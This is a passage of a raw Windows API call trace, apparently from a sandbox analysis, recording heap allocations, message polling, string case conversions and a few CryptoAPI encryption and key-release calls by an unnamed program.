HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.684] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x200) returned 1 [0251.684] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.684] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.684] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.684] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.684] CharLowerBuffW (in: lpsz="byte[512]", cchLength=0x9 | out: lpsz="byte[512]") returned 0x9 [0251.684] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.684] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.684] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.684] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.685] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.685] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.685] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.685] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24f4348*, pdwDataLen=0x8bef68*=0x1f8, dwBufLen=0x200 | out: pbData=0x24f4348*, pdwDataLen=0x8bef68*=0x200) returned 1 [0251.685] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.685] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.685] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.685] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.685] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.685] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.685] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.685] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0251.685] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.685] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0251.686] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.686] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.686] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0251.686] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.686] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0251.686] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.686] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.686] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.686] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.686] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.686] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.686] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.686] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.686] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.686] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.687] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.687] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.688] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.688] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.688] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0251.688] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.688] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0251.688] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.688] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.688] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.688] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0251.688] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.688] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0251.688] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0251.689] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.689] CryptDestroyKey (hKey=0xaa58a0) returned 1 [0251.689] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.689] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.689] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0251.689] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.689] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0251.689] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.689] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.689] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0251.689] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.689] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0251.689] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.689] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.689] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.690] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.690] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.690] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0251.690] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.690] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0251.690] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0251.690] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.690] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.690] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.690] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.690] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.690] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0251.690] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.690] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0251.690] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.691] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.691] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0251.691] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.691] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0251.691] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.691] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.691] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.691] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.691] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.691] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.691] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.691] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.691] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.691] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.691] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.691] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.692] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.692] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.692] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.692] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0251.692] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.692] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0251.692] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.692] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.692] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.692] CryptReleaseContext (hProv=0xad2c70, dwFlags=0x0) returned 1 [0251.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0251.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0251.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0251.695] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0251.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0251.695] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0251.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0251.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.695] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.695] 